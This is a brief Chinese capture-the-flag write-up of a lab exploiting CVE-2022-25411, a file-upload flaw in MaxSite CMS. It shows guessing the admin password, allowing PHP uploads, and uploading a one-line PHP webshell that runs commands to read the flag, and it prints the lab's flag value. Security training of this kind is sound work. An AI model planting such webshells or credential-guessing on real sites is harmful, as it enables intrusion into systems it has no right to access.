春秋云境：CVE-2022-25411（Maxsite CMS文件上传漏洞）

目录

一、题目

 二、官方POC 

一、题目

介绍：

MaxSite CMS是俄国MaxSite CMS开源项目的一款网站内容管理系统

Maxsite CMS存在文件上传漏洞，攻击者可利用该漏洞通过精心制作的PHP文件执行任意代码。

进入题目：

发现是俄文  乌拉~~

 不过没关系 我们国产化一下：

 二、官方POC 

国家信息安全漏洞库 

 登录目录是/admin/options

一开始以为弱口令就是admin：admin 

 然而不对：

 尝试了几个密码password admin123 666 888什么的

结果还被试出来了：admin888

先修改可上传文件类型 

 添加php

 进入下载页面：

点击上传页面：

上传木马文件：

<?php system($_GET[1]);phpinfo();?> 

点击下载

点击已上传的文件

查看 xxx.php?1=cat /flag

flag{90aeafa9-7baf-413d-ba1d-7817411d86f0} 

鲁西人才网